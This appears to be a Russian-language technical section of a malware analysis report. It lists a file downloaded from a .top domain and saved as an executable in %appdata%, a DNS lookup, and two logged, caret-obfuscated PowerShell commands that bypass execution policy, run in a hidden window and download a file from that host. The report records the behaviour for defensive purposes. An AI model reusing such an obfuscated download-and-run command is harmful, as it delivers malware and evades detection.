Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwErsH^eLL^.^ExE -ex^ECUTI^oN^P^OlICY b^Y^P^aSS^ -^N^opro^F^i^Le -^w^i^nD^owST^Y^lE hid^deN ^(nEw-oBjEc^t sYS^Tem.N^Et^.WE^Bc^LIENT)^.DOwnLO^adfi^lE(^'http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POwErsH^eLL^.^ExE -ex^ECUTI^oN^P^OlICY b^Y^P^aSS^ -^N^opro^F^i^Le -^w^i^nD^owST^Y^lE hid^deN ^(nEw-oBjEc^t sYS^Tem.N^Et^.WE^Bc^LIENT)^.DOwnLO^adfi^lE(^'http://www.zoerpoled....' (со скрытым окном)